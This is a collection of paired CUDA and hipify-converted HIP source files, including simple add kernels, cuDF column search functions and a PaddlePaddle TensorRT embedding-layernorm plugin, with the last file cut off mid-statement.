// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include "vector.h" #include <iostream> #include <math.h> // Add vector __global__ void _cuda_add(int n, float *x, float *y) { int index = threadIdx.x; int stride = blockDim.x; for (int i = index; i < n; i += stride) y[i] = x[i] + y[i]; } namespace Vectors { // Accepts void add(float *&x, float *&y, void(*callable)(float *&, float *&, int), int N) { // Allocate Unified Memory accessible from CPU or GPU hipMallocManaged(&x, N*sizeof(float)); hipMallocManaged(&y, N*sizeof(float)); callable(x, y, N); // Run kernel on 1M elements on the GPU hipLaunchKernelGGL(( _cuda_add), dim3(1), dim3(256), 0, 0, N, x, y); // Wait for GPU to finish before accessing on host hipDeviceSynchronize(); } void free(float *&x, float *&y) { hipFree(x); hipFree(y); } }
8007db367ed863cdff8e196528d057655d20c7bf.cu
#include "vector.h" #include <iostream> #include <math.h> // Add vector __global__ void _cuda_add(int n, float *x, float *y) { int index = threadIdx.x; int stride = blockDim.x; for (int i = index; i < n; i += stride) y[i] = x[i] + y[i]; } namespace Vectors { // Accepts void add(float *&x, float *&y, void(*callable)(float *&, float *&, int), int N) { // Allocate Unified Memory – accessible from CPU or GPU cudaMallocManaged(&x, N*sizeof(float)); cudaMallocManaged(&y, N*sizeof(float)); callable(x, y, N); // Run kernel on 1M elements on the GPU _cuda_add<<<1, 256>>>(N, x, y); // Wait for GPU to finish before accessing on host cudaDeviceSynchronize(); } void free(float *&x, float *&y) { cudaFree(x); cudaFree(y); } }
9bffe7f1e251744d18617bf81187d4bb52c8853a.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include <iostream> __global__ void add(int a, int b, int *c){ *c = a + b; } int main(void) { int c; int *dev_c; hipMalloc( (void **)&dev_c, sizeof(int) ); hipLaunchKernelGGL(( add), dim3(1),dim3(1), 0, 0, 2, 7, dev_c); hipMemcpy(&c, dev_c, sizeof(int), hipMemcpyDeviceToHost); std::cout << "2 + 7 =" << c << std::endl; hipFree(dev_c); return 0; }
9bffe7f1e251744d18617bf81187d4bb52c8853a.cu
#include <iostream> __global__ void add(int a, int b, int *c){ *c = a + b; } int main(void) { int c; int *dev_c; cudaMalloc( (void **)&dev_c, sizeof(int) ); add<<<1,1>>>(2, 7, dev_c); cudaMemcpy(&c, dev_c, sizeof(int), cudaMemcpyDeviceToHost); std::cout << "2 + 7 =" << c << std::endl; cudaFree(dev_c); return 0; }
cd169086204ff89cc7e65dad9c4a6215e44c324e.hip
// !!! This is a file automatically generated by hipify!!! /* * Copyright (c) 2019-2020, NVIDIA CORPORATION. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include <cudf/column/column_factories.hpp> #include <cudf/detail/iterator.cuh> #include <cudf/detail/nvtx/ranges.hpp> #include <cudf/detail/search.hpp> #include <cudf/dictionary/detail/search.hpp> #include <cudf/dictionary/detail/update_keys.hpp> #include <cudf/scalar/scalar_device_view.cuh> #include <cudf/search.hpp> #include <cudf/table/row_operators.cuh> #include <cudf/table/table_device_view.cuh> #include <cudf/table/table_view.hpp> #include <hash/unordered_multiset.cuh> #include <rmm/cuda_stream_view.hpp> #include <thrust/binary_search.h> namespace cudf { namespace { template <typename DataIterator, typename ValuesIterator, typename OutputIterator, typename Comparator> void launch_search(DataIterator it_data, ValuesIterator it_vals, size_type data_size, size_type values_size, OutputIterator it_output, Comparator comp, bool find_first, rmm::cuda_stream_view stream) { if (find_first) { thrust::lower_bound(rmm::exec_policy(stream)->on(stream.value()), it_data, it_data + data_size, it_vals, it_vals + values_size, it_output, comp); } else { thrust::upper_bound(rmm::exec_policy(stream)->on(stream.value()), it_data, it_data + data_size, it_vals, it_vals + values_size, it_output, comp); } } std::unique_ptr<column> search_ordered(table_view const& t, table_view const& values, bool find_first, std::vector<order> const& column_order, std::vector<null_order> const& null_precedence, rmm::cuda_stream_view stream, rmm::mr::device_memory_resource* mr) { // Allocate result column std::unique_ptr<column> result = make_numeric_column( data_type{type_to_id<size_type>()}, values.num_rows(), mask_state::UNALLOCATED, stream, mr); mutable_column_view result_view = result.get()->mutable_view(); // Handle empty inputs if (t.num_rows() == 0) { CUDA_TRY(hipMemsetAsync( result_view.data<size_type>(), 0, values.num_rows() * sizeof(size_type), stream.value())); return result; } if (not column_order.empty()) { CUDF_EXPECTS(static_cast<std::size_t>(t.num_columns()) == column_order.size(), "Mismatch between number of columns and column order."); } if (not null_precedence.empty()) { CUDF_EXPECTS(static_cast<std::size_t>(t.num_columns()) == null_precedence.size(), "Mismatch between number of columns and null precedence."); } // This utility will ensure all corresponding dictionary columns have matching keys. // It will return any new dictionary columns created as well as updated table_views. auto matched = dictionary::detail::match_dictionaries({t, values}, stream); auto d_t = table_device_view::create(matched.second.front(), stream); auto d_values = table_device_view::create(matched.second.back(), stream); auto count_it = thrust::make_counting_iterator<size_type>(0); rmm::device_vector<order> d_column_order(column_order.begin(), column_order.end()); rmm::device_vector<null_order> d_null_precedence(null_precedence.begin(), null_precedence.end()); if (has_nulls(t) or has_nulls(values)) { auto ineq_op = (find_first) ? row_lexicographic_comparator<true>( *d_t, *d_values, d_column_order.data().get(), d_null_precedence.data().get()) : row_lexicographic_comparator<true>( *d_values, *d_t, d_column_order.data().get(), d_null_precedence.data().get()); launch_search(count_it, count_it, t.num_rows(), values.num_rows(), result_view.data<size_type>(), ineq_op, find_first, stream); } else { auto ineq_op = (find_first) ? row_lexicographic_comparator<false>( *d_t, *d_values, d_column_order.data().get(), d_null_precedence.data().get()) : row_lexicographic_comparator<false>( *d_values, *d_t, d_column_order.data().get(), d_null_precedence.data().get()); launch_search(count_it, count_it, t.num_rows(), values.num_rows(), result_view.data<size_type>(), ineq_op, find_first, stream); } return result; } struct contains_scalar_dispatch { template <typename Element> bool operator()(column_view const& col, scalar const& value, rmm::cuda_stream_view stream) { CUDF_EXPECTS(col.type() == value.type(), "scalar and column types must match"); using Type = device_storage_type_t<Element>; using ScalarType = cudf::scalar_type_t<Element>; auto d_col = column_device_view::create(col, stream); auto s = static_cast<const ScalarType*>(&value); if (col.has_nulls()) { auto found_iter = thrust::find(rmm::exec_policy(stream)->on(stream.value()), d_col->pair_begin<Type, true>(), d_col->pair_end<Type, true>(), thrust::make_pair(s->value(), true)); return found_iter != d_col->pair_end<Type, true>(); } else { auto found_iter = thrust::find(rmm::exec_policy(stream)->on(stream.value()), // d_col->begin<Type>(), d_col->end<Type>(), s->value()); return found_iter != d_col->end<Type>(); } } }; template <> bool contains_scalar_dispatch::operator()<cudf::list_view>(column_view const& col, scalar const& value, rmm::cuda_stream_view stream) { CUDF_FAIL("list_view type not supported yet"); } template <> bool contains_scalar_dispatch::operator()<cudf::struct_view>(column_view const& col, scalar const& value, rmm::cuda_stream_view stream) { CUDF_FAIL("struct_view type not supported yet"); } template <> bool contains_scalar_dispatch::operator()<cudf::dictionary32>(column_view const& col, scalar const& value, rmm::cuda_stream_view stream) { auto dict_col = cudf::dictionary_column_view(col); // first, find the value in the dictionary's key set auto index = cudf::dictionary::detail::get_index(dict_col, value, stream); // if found, check the index is actually in the indices column return index->is_valid() ? cudf::type_dispatcher(dict_col.indices().type(), contains_scalar_dispatch{}, dict_col.indices(), *index, stream) : false; } } // namespace namespace detail { bool contains(column_view const& col, scalar const& value, rmm::cuda_stream_view stream) { if (col.is_empty()) { return false; } if (not value.is_valid()) { return col.has_nulls(); } return cudf::type_dispatcher(col.type(), contains_scalar_dispatch{}, col, value, stream); } struct multi_contains_dispatch { template <typename Element> std::unique_ptr<column> operator()(column_view const& haystack, column_view const& needles, rmm::cuda_stream_view stream, rmm::mr::device_memory_resource* mr) { std::unique_ptr<column> result = make_numeric_column(data_type{type_to_id<bool>()}, haystack.size(), copy_bitmask(haystack), haystack.null_count(), stream, mr); if (haystack.is_empty()) { return result; } mutable_column_view result_view = result.get()->mutable_view(); if (needles.is_empty()) { thrust::fill(rmm::exec_policy(stream)->on(stream.value()), result_view.begin<bool>(), result_view.end<bool>(), false); return result; } auto hash_set = cudf::detail::unordered_multiset<Element>::create(needles, stream.value()); auto device_hash_set = hash_set.to_device(); auto d_haystack_ptr = column_device_view::create(haystack, stream); auto d_haystack = *d_haystack_ptr; if (haystack.has_nulls()) { thrust::transform(rmm::exec_policy(stream)->on(stream.value()), thrust::make_counting_iterator<size_type>(0), thrust::make_counting_iterator<size_type>(haystack.size()), result_view.begin<bool>(), [device_hash_set, d_haystack] __device__(size_t index) { return d_haystack.is_null_nocheck(index) || device_hash_set.contains(d_haystack.element<Element>(index)); }); } else { thrust::transform(rmm::exec_policy(stream)->on(stream.value()), thrust::make_counting_iterator<size_type>(0), thrust::make_counting_iterator<size_type>(haystack.size()), result_view.begin<bool>(), [device_hash_set, d_haystack] __device__(size_t index) { return device_hash_set.contains(d_haystack.element<Element>(index)); }); } return result; } }; template <> std::unique_ptr<column> multi_contains_dispatch::operator()<list_view>( column_view const& haystack, column_view const& needles, rmm::cuda_stream_view stream, rmm::mr::device_memory_resource* mr) { CUDF_FAIL("list_view type not supported"); } template <> std::unique_ptr<column> multi_contains_dispatch::operator()<struct_view>( column_view const& haystack, column_view const& needles, rmm::cuda_stream_view stream, rmm::mr::device_memory_resource* mr) { CUDF_FAIL("struct_view type not supported"); } template <> std::unique_ptr<column> multi_contains_dispatch::operator()<dictionary32>( column_view const& haystack_in, column_view const& needles_in, rmm::cuda_stream_view stream, rmm::mr::device_memory_resource* mr) { dictionary_column_view const haystack(haystack_in); dictionary_column_view const needles(needles_in); // first combine keys so both dictionaries have the same set auto haystack_matched = dictionary::detail::add_keys(haystack, needles.keys(), stream); auto const haystack_view = dictionary_column_view(haystack_matched->view()); auto needles_matched = dictionary::detail::set_keys(needles, haystack_view.keys(), stream); auto const needles_view = dictionary_column_view(needles_matched->view()); // now just use the indices for the contains column_view const haystack_indices = haystack_view.get_indices_annotated(); column_view const needles_indices = needles_view.get_indices_annotated(); return cudf::type_dispatcher(haystack_indices.type(), multi_contains_dispatch{}, haystack_indices, needles_indices, stream, mr); } std::unique_ptr<column> contains(column_view const& haystack, column_view const& needles, rmm::cuda_stream_view stream, rmm::mr::device_memory_resource* mr) { CUDF_EXPECTS(haystack.type() == needles.type(), "DTYPE mismatch"); return cudf::type_dispatcher( haystack.type(), multi_contains_dispatch{}, haystack, needles, stream, mr); } std::unique_ptr<column> lower_bound(table_view const& t, table_view const& values, std::vector<order> const& column_order, std::vector<null_order> const& null_precedence, rmm::cuda_stream_view stream, rmm::mr::device_memory_resource* mr) { return search_ordered(t, values, true, column_order, null_precedence, stream, mr); } std::unique_ptr<column> upper_bound(table_view const& t, table_view const& values, std::vector<order> const& column_order, std::vector<null_order> const& null_precedence, rmm::cuda_stream_view stream, rmm::mr::device_memory_resource* mr) { return search_ordered(t, values, false, column_order, null_precedence, stream, mr); } } // namespace detail // external APIs std::unique_ptr<column> lower_bound(table_view const& t, table_view const& values, std::vector<order> const& column_order, std::vector<null_order> const& null_precedence, rmm::mr::device_memory_resource* mr) { CUDF_FUNC_RANGE(); return detail::lower_bound( t, values, column_order, null_precedence, rmm::cuda_stream_default, mr); } std::unique_ptr<column> upper_bound(table_view const& t, table_view const& values, std::vector<order> const& column_order, std::vector<null_order> const& null_precedence, rmm::mr::device_memory_resource* mr) { CUDF_FUNC_RANGE(); return detail::upper_bound( t, values, column_order, null_precedence, rmm::cuda_stream_default, mr); } bool contains(column_view const& col, scalar const& value) { CUDF_FUNC_RANGE(); return detail::contains(col, value, rmm::cuda_stream_default); } std::unique_ptr<column> contains(column_view const& haystack, column_view const& needles, rmm::mr::device_memory_resource* mr) { CUDF_FUNC_RANGE(); return detail::contains(haystack, needles, rmm::cuda_stream_default, mr); } } // namespace cudf
cd169086204ff89cc7e65dad9c4a6215e44c324e.cu
/* * Copyright (c) 2019-2020, NVIDIA CORPORATION. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include <cudf/column/column_factories.hpp> #include <cudf/detail/iterator.cuh> #include <cudf/detail/nvtx/ranges.hpp> #include <cudf/detail/search.hpp> #include <cudf/dictionary/detail/search.hpp> #include <cudf/dictionary/detail/update_keys.hpp> #include <cudf/scalar/scalar_device_view.cuh> #include <cudf/search.hpp> #include <cudf/table/row_operators.cuh> #include <cudf/table/table_device_view.cuh> #include <cudf/table/table_view.hpp> #include <hash/unordered_multiset.cuh> #include <rmm/cuda_stream_view.hpp> #include <thrust/binary_search.h> namespace cudf { namespace { template <typename DataIterator, typename ValuesIterator, typename OutputIterator, typename Comparator> void launch_search(DataIterator it_data, ValuesIterator it_vals, size_type data_size, size_type values_size, OutputIterator it_output, Comparator comp, bool find_first, rmm::cuda_stream_view stream) { if (find_first) { thrust::lower_bound(rmm::exec_policy(stream)->on(stream.value()), it_data, it_data + data_size, it_vals, it_vals + values_size, it_output, comp); } else { thrust::upper_bound(rmm::exec_policy(stream)->on(stream.value()), it_data, it_data + data_size, it_vals, it_vals + values_size, it_output, comp); } } std::unique_ptr<column> search_ordered(table_view const& t, table_view const& values, bool find_first, std::vector<order> const& column_order, std::vector<null_order> const& null_precedence, rmm::cuda_stream_view stream, rmm::mr::device_memory_resource* mr) { // Allocate result column std::unique_ptr<column> result = make_numeric_column( data_type{type_to_id<size_type>()}, values.num_rows(), mask_state::UNALLOCATED, stream, mr); mutable_column_view result_view = result.get()->mutable_view(); // Handle empty inputs if (t.num_rows() == 0) { CUDA_TRY(cudaMemsetAsync( result_view.data<size_type>(), 0, values.num_rows() * sizeof(size_type), stream.value())); return result; } if (not column_order.empty()) { CUDF_EXPECTS(static_cast<std::size_t>(t.num_columns()) == column_order.size(), "Mismatch between number of columns and column order."); } if (not null_precedence.empty()) { CUDF_EXPECTS(static_cast<std::size_t>(t.num_columns()) == null_precedence.size(), "Mismatch between number of columns and null precedence."); } // This utility will ensure all corresponding dictionary columns have matching keys. // It will return any new dictionary columns created as well as updated table_views. auto matched = dictionary::detail::match_dictionaries({t, values}, stream); auto d_t = table_device_view::create(matched.second.front(), stream); auto d_values = table_device_view::create(matched.second.back(), stream); auto count_it = thrust::make_counting_iterator<size_type>(0); rmm::device_vector<order> d_column_order(column_order.begin(), column_order.end()); rmm::device_vector<null_order> d_null_precedence(null_precedence.begin(), null_precedence.end()); if (has_nulls(t) or has_nulls(values)) { auto ineq_op = (find_first) ? row_lexicographic_comparator<true>( *d_t, *d_values, d_column_order.data().get(), d_null_precedence.data().get()) : row_lexicographic_comparator<true>( *d_values, *d_t, d_column_order.data().get(), d_null_precedence.data().get()); launch_search(count_it, count_it, t.num_rows(), values.num_rows(), result_view.data<size_type>(), ineq_op, find_first, stream); } else { auto ineq_op = (find_first) ? row_lexicographic_comparator<false>( *d_t, *d_values, d_column_order.data().get(), d_null_precedence.data().get()) : row_lexicographic_comparator<false>( *d_values, *d_t, d_column_order.data().get(), d_null_precedence.data().get()); launch_search(count_it, count_it, t.num_rows(), values.num_rows(), result_view.data<size_type>(), ineq_op, find_first, stream); } return result; } struct contains_scalar_dispatch { template <typename Element> bool operator()(column_view const& col, scalar const& value, rmm::cuda_stream_view stream) { CUDF_EXPECTS(col.type() == value.type(), "scalar and column types must match"); using Type = device_storage_type_t<Element>; using ScalarType = cudf::scalar_type_t<Element>; auto d_col = column_device_view::create(col, stream); auto s = static_cast<const ScalarType*>(&value); if (col.has_nulls()) { auto found_iter = thrust::find(rmm::exec_policy(stream)->on(stream.value()), d_col->pair_begin<Type, true>(), d_col->pair_end<Type, true>(), thrust::make_pair(s->value(), true)); return found_iter != d_col->pair_end<Type, true>(); } else { auto found_iter = thrust::find(rmm::exec_policy(stream)->on(stream.value()), // d_col->begin<Type>(), d_col->end<Type>(), s->value()); return found_iter != d_col->end<Type>(); } } }; template <> bool contains_scalar_dispatch::operator()<cudf::list_view>(column_view const& col, scalar const& value, rmm::cuda_stream_view stream) { CUDF_FAIL("list_view type not supported yet"); } template <> bool contains_scalar_dispatch::operator()<cudf::struct_view>(column_view const& col, scalar const& value, rmm::cuda_stream_view stream) { CUDF_FAIL("struct_view type not supported yet"); } template <> bool contains_scalar_dispatch::operator()<cudf::dictionary32>(column_view const& col, scalar const& value, rmm::cuda_stream_view stream) { auto dict_col = cudf::dictionary_column_view(col); // first, find the value in the dictionary's key set auto index = cudf::dictionary::detail::get_index(dict_col, value, stream); // if found, check the index is actually in the indices column return index->is_valid() ? cudf::type_dispatcher(dict_col.indices().type(), contains_scalar_dispatch{}, dict_col.indices(), *index, stream) : false; } } // namespace namespace detail { bool contains(column_view const& col, scalar const& value, rmm::cuda_stream_view stream) { if (col.is_empty()) { return false; } if (not value.is_valid()) { return col.has_nulls(); } return cudf::type_dispatcher(col.type(), contains_scalar_dispatch{}, col, value, stream); } struct multi_contains_dispatch { template <typename Element> std::unique_ptr<column> operator()(column_view const& haystack, column_view const& needles, rmm::cuda_stream_view stream, rmm::mr::device_memory_resource* mr) { std::unique_ptr<column> result = make_numeric_column(data_type{type_to_id<bool>()}, haystack.size(), copy_bitmask(haystack), haystack.null_count(), stream, mr); if (haystack.is_empty()) { return result; } mutable_column_view result_view = result.get()->mutable_view(); if (needles.is_empty()) { thrust::fill(rmm::exec_policy(stream)->on(stream.value()), result_view.begin<bool>(), result_view.end<bool>(), false); return result; } auto hash_set = cudf::detail::unordered_multiset<Element>::create(needles, stream.value()); auto device_hash_set = hash_set.to_device(); auto d_haystack_ptr = column_device_view::create(haystack, stream); auto d_haystack = *d_haystack_ptr; if (haystack.has_nulls()) { thrust::transform(rmm::exec_policy(stream)->on(stream.value()), thrust::make_counting_iterator<size_type>(0), thrust::make_counting_iterator<size_type>(haystack.size()), result_view.begin<bool>(), [device_hash_set, d_haystack] __device__(size_t index) { return d_haystack.is_null_nocheck(index) || device_hash_set.contains(d_haystack.element<Element>(index)); }); } else { thrust::transform(rmm::exec_policy(stream)->on(stream.value()), thrust::make_counting_iterator<size_type>(0), thrust::make_counting_iterator<size_type>(haystack.size()), result_view.begin<bool>(), [device_hash_set, d_haystack] __device__(size_t index) { return device_hash_set.contains(d_haystack.element<Element>(index)); }); } return result; } }; template <> std::unique_ptr<column> multi_contains_dispatch::operator()<list_view>( column_view const& haystack, column_view const& needles, rmm::cuda_stream_view stream, rmm::mr::device_memory_resource* mr) { CUDF_FAIL("list_view type not supported"); } template <> std::unique_ptr<column> multi_contains_dispatch::operator()<struct_view>( column_view const& haystack, column_view const& needles, rmm::cuda_stream_view stream, rmm::mr::device_memory_resource* mr) { CUDF_FAIL("struct_view type not supported"); } template <> std::unique_ptr<column> multi_contains_dispatch::operator()<dictionary32>( column_view const& haystack_in, column_view const& needles_in, rmm::cuda_stream_view stream, rmm::mr::device_memory_resource* mr) { dictionary_column_view const haystack(haystack_in); dictionary_column_view const needles(needles_in); // first combine keys so both dictionaries have the same set auto haystack_matched = dictionary::detail::add_keys(haystack, needles.keys(), stream); auto const haystack_view = dictionary_column_view(haystack_matched->view()); auto needles_matched = dictionary::detail::set_keys(needles, haystack_view.keys(), stream); auto const needles_view = dictionary_column_view(needles_matched->view()); // now just use the indices for the contains column_view const haystack_indices = haystack_view.get_indices_annotated(); column_view const needles_indices = needles_view.get_indices_annotated(); return cudf::type_dispatcher(haystack_indices.type(), multi_contains_dispatch{}, haystack_indices, needles_indices, stream, mr); } std::unique_ptr<column> contains(column_view const& haystack, column_view const& needles, rmm::cuda_stream_view stream, rmm::mr::device_memory_resource* mr) { CUDF_EXPECTS(haystack.type() == needles.type(), "DTYPE mismatch"); return cudf::type_dispatcher( haystack.type(), multi_contains_dispatch{}, haystack, needles, stream, mr); } std::unique_ptr<column> lower_bound(table_view const& t, table_view const& values, std::vector<order> const& column_order, std::vector<null_order> const& null_precedence, rmm::cuda_stream_view stream, rmm::mr::device_memory_resource* mr) { return search_ordered(t, values, true, column_order, null_precedence, stream, mr); } std::unique_ptr<column> upper_bound(table_view const& t, table_view const& values, std::vector<order> const& column_order, std::vector<null_order> const& null_precedence, rmm::cuda_stream_view stream, rmm::mr::device_memory_resource* mr) { return search_ordered(t, values, false, column_order, null_precedence, stream, mr); } } // namespace detail // external APIs std::unique_ptr<column> lower_bound(table_view const& t, table_view const& values, std::vector<order> const& column_order, std::vector<null_order> const& null_precedence, rmm::mr::device_memory_resource* mr) { CUDF_FUNC_RANGE(); return detail::lower_bound( t, values, column_order, null_precedence, rmm::cuda_stream_default, mr); } std::unique_ptr<column> upper_bound(table_view const& t, table_view const& values, std::vector<order> const& column_order, std::vector<null_order> const& null_precedence, rmm::mr::device_memory_resource* mr) { CUDF_FUNC_RANGE(); return detail::upper_bound( t, values, column_order, null_precedence, rmm::cuda_stream_default, mr); } bool contains(column_view const& col, scalar const& value) { CUDF_FUNC_RANGE(); return detail::contains(col, value, rmm::cuda_stream_default); } std::unique_ptr<column> contains(column_view const& haystack, column_view const& needles, rmm::mr::device_memory_resource* mr) { CUDF_FUNC_RANGE(); return detail::contains(haystack, needles, rmm::cuda_stream_default, mr); } } // namespace cudf
df29a90f2f4a5acf1155073cbfc4534dfbb1c0c2.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" extern "C" __global__ void sgemm_tn_vec_128x64( float* param_C, const float* param_A, const float* param_B, float param_alpha, float param_beta, int param_flags, int param_lda, int param_ldb, int param_ldc, int param_m, int param_n, int param_k, int param_ldaz, int param_ldbz, int param_ldcz, int param_batch_loops ) { __shared__ float share[128*8*2 + 64*8*2 + 4]; *param_C = share[0]; }
df29a90f2f4a5acf1155073cbfc4534dfbb1c0c2.cu
extern "C" __global__ void sgemm_tn_vec_128x64( float* param_C, const float* param_A, const float* param_B, float param_alpha, float param_beta, int param_flags, int param_lda, int param_ldb, int param_ldc, int param_m, int param_n, int param_k, int param_ldaz, int param_ldbz, int param_ldcz, int param_batch_loops ) { __shared__ float share[128*8*2 + 64*8*2 + 4]; *param_C = share[0]; }
c16285441bba604609620d24dde7c4709f3457c0.hip
// !!! This is a file automatically generated by hipify!!! // Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved. // SPDX-FileCopyrightText: Copyright (c) 1993-2022 NVIDIA CORPORATION & // AFFILIATES. All rights reserved. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. #include "paddle/fluid/inference/tensorrt/plugin/many_emb_layernorm_varseqlen_plugin.h" #include <hip/hip_runtime.h> #include <cstring> #include <vector> #include "NvInfer.h" namespace paddle { namespace inference { namespace tensorrt { namespace plugin { constexpr size_t threadsPerCta128 = 2 * 2 * 32; constexpr size_t threadsPerCta256 = 1 * 4 * 32; constexpr size_t threadsPerCta384 = 1 * 8 * 32; // The number of xmmas in the M dimension. We use one uint32_t per XMMA in the M // dimension: (s + 16*warps_m - 1) / (16*warps_m); constexpr size_t xmmasM128 = 4; constexpr size_t xmmasM256 = 16; constexpr size_t xmmasM384 = 24; // Packed mask size per batch. Layout is XMMAS_M * THREADS_PER_CTA. constexpr size_t packedMaskSize128 = xmmasM128 * threadsPerCta128; constexpr size_t packedMaskSize256 = xmmasM256 * threadsPerCta256; constexpr size_t packedMaskSize384 = xmmasM384 * threadsPerCta384; char const* EMB_LAYER_NORM_VAR_SEQLEN_VERSION_HFACE{"1"}; char const* EMB_LAYER_NORM_VAR_SEQLEN_VERSION_MTRON{"2"}; char const* EMB_LAYER_NORM_VAR_SEQLEN_NAME{ "ManyEmbLayerNormVarlenPluginDynamic"}; // Static class fields initialization nvinfer1::PluginFieldCollection EmbLayerNormVarSeqlenPluginBaseCreator::mFC{}; std::vector<nvinfer1::PluginField> EmbLayerNormVarSeqlenPluginBaseCreator::mPluginAttributes; EmbLayerNormVarSeqlenPluginBase::EmbLayerNormVarSeqlenPluginBase( std::string const& name, nvinfer1::DataType const type, nvinfer1::Weights const& beta, nvinfer1::Weights const& gamma, const std::vector<nvinfer1::Weights>& IdsEmb) : mLayerName(name), mLd(beta.count), mType(type), mIdsEmb_(IdsEmb), nbLookupTables_(static_cast<int>(IdsEmb.size())) { // Assuming Weights.count is the number of elements and not bytes assert(beta.count == gamma.count); mBeta.convertAndCopy(beta, nvinfer1::DataType::kFLOAT); mGamma.convertAndCopy(gamma, nvinfer1::DataType::kFLOAT); copyToDevice(&mGamma, sizeof(float) * mGamma.count, &mGammaDev); copyToDevice(&mBeta, sizeof(float) * mBeta.count, &mBetaDev); for (size_t i = 0; i < mIdsEmb_.size(); ++i) { assert(mIdsEmb_[i].count % mLd == 0); mIdsVocabSize.push_back(int32_t(mIdsEmb_[i].count / mLd)); WeightsWithOwnership tem_weight; tem_weight.convertAndCopy(mIdsEmb_[i], mType); void* cudaMem{nullptr}; PADDLE_ENFORCE_GPU_SUCCESS( hipMalloc(&cudaMem, getWeightsSize(tem_weight, mType))); PADDLE_ENFORCE_GPU_SUCCESS(hipMemcpy(cudaMem, tem_weight.values, getWeightsSize(tem_weight, mType), hipMemcpyHostToDevice)); mIdsEmbPtrs.push_back(cudaMem); } } EmbLayerNormVarSeqlenPluginBase::EmbLayerNormVarSeqlenPluginBase( std::string const& name, void const* data, size_t length) : mLayerName(name), mGammaDev(nullptr), mBetaDev(nullptr), mIdsEmbPtrs{}, mIdsEmb_{} { // Deserialize in the same order as serialization deserialize_value(&data, &length, &mType); deserialize_value(&data, &length, &mLd); deserialize_value(&data, &length, &nbLookupTables_); for (int32_t i = 0; i < nbLookupTables_; ++i) { int32_t tem; deserialize_value(&data, &length, &tem); mIdsVocabSize.push_back(tem); } char const* d = static_cast<char const*>(data); mBeta.convertAndCopy(&d, mLd, nvinfer1::DataType::kFLOAT); mGamma.convertAndCopy(&d, mLd, nvinfer1::DataType::kFLOAT); for (int32_t i = 0; i < nbLookupTables_; ++i) { nvinfer1::Weights pre_tem_weight; pre_tem_weight.type = mType; pre_tem_weight.count = mLd * size_t(mIdsVocabSize[i]); const auto nbBytes = mLd * size_t(mIdsVocabSize[i]) * getElementSize(mType); auto destBuf = new char[nbBytes]; pre_tem_weight.values = destBuf; std::copy_n(d, nbBytes, destBuf); d += nbBytes; mIdsEmb_.push_back(pre_tem_weight); } } EmbLayerNormVarSeqlenPluginHFace::EmbLayerNormVarSeqlenPluginHFace( std::string const& name, nvinfer1::DataType const type, nvinfer1::Weights const& beta, nvinfer1::Weights const& gamma, const std::vector<nvinfer1::Weights>& IdsEmb) : EmbLayerNormVarSeqlenPluginBase(name, type, beta, gamma, IdsEmb) {} EmbLayerNormVarSeqlenPluginHFace::EmbLayerNormVarSeqlenPluginHFace( std::string const& name, void const* data, size_t length) : EmbLayerNormVarSeqlenPluginBase(name, data, length) { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginHFace deserialize"); } EmbLayerNormVarSeqlenPluginMTron::EmbLayerNormVarSeqlenPluginMTron( std::string const& name, nvinfer1::DataType const type, nvinfer1::Weights const& beta, nvinfer1::Weights const& gamma, const std::vector<nvinfer1::Weights>& IdsEmb) : EmbLayerNormVarSeqlenPluginBase(name, type, beta, gamma, IdsEmb) {} EmbLayerNormVarSeqlenPluginMTron::EmbLayerNormVarSeqlenPluginMTron( std::string const& name, void const* data, size_t length) : EmbLayerNormVarSeqlenPluginBase(name, data, length) { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginMTron deserialize"); } // IPluginV2DynamicExt Methods nvinfer1::IPluginV2DynamicExt* EmbLayerNormVarSeqlenPluginHFace::clone() const noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginHFace clone"); auto p = new EmbLayerNormVarSeqlenPluginHFace( mLayerName, mType, mBeta, mGamma, mIdsEmb_); p->setPluginNamespace(mNamespace.c_str()); return p; } nvinfer1::IPluginV2DynamicExt* EmbLayerNormVarSeqlenPluginMTron::clone() const noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginMTron clone"); auto p = new EmbLayerNormVarSeqlenPluginMTron( mLayerName, mType, mBeta, mGamma, mIdsEmb_); p->setPluginNamespace(mNamespace.c_str()); return p; } nvinfer1::DimsExprs EmbLayerNormVarSeqlenPluginHFace::getOutputDimensions( int32_t outputIndex, nvinfer1::DimsExprs const* inputs, int32_t nbInputs, nvinfer1::IExprBuilder& exprBuilder) noexcept { for (int i = 1; i < nbInputs - 1; ++i) { assert(inputs[i].nbDims == 1); // seq length assert(inputs[i].nbDims == inputs[1].nbDims); // same shape } assert(inputs[0].nbDims == 1); // pos_id: B+1 if (outputIndex == 0) { nvinfer1::DimsExprs ret; ret.nbDims = 4; ret.d[0] = inputs[1].d[0]; // sum of seq length ret.d[1] = exprBuilder.constant(mLd); ret.d[2] = exprBuilder.constant(1); ret.d[3] = exprBuilder.constant(1); return ret; } else if (outputIndex == 1) { // This is a hack: we just report some mask size and rely the plugins to // play nicely together. // At runtime, depending on the actual maxSeqlen, the size might be // different. int32_t maskSize_ = packedMaskSize384; auto maskSize = exprBuilder.constant(maskSize_); auto fp16maskSize = 